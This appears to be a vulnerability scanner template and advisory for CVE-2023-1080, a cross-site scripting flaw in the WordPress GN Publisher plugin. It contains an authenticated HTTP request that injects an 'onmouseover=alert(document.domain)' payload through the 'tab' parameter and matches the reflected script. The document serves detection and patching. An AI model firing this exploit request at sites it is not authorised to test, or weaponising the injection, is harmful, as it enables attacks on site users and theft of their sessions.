WordPress GN Publisher <1.5.6 - Cross-Site Scripting

2023-03-3111:28:24

ProjectDiscovery

github.com

cve2023

wp-plugin

wordpress

gn-publisher

authenticated

xss

wpscan

gnpublisher

cross-site scripting

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

66.0%

JSON

WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2023-1080

info:
  name: WordPress GN Publisher <1.5.6 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
  remediation: Fixed in version 1.5.6.
  reference:
    - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74
    - https://wordpress.org/plugins/gn-publisher/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1080
    - https://plugins.trac.wordpress.org/browser/gn-publisher/trunk/templates/settings.php#L70
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1080
    cwe-id: CWE-79
    epss-score: 0.00262
    epss-percentile: 0.65937
    cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gnpublisher
    product: gn_publisher
    framework: wordpress
  tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "/ onmouseover=alert(document.domain);//")'
          - 'contains(body_2, "GN Publisher")'
        condition: and
# digest: 490a0046304402202b609b4ae1aa40731a8add9877fadcbf435ea7adc7aa46ba176951fe72d3d805022003ef448a0c5dbea69b1438ad3eb0dc481a9eb42ce5eeaf882e68c97f64112fe0:922c64590222798bb761d5b6d8e72950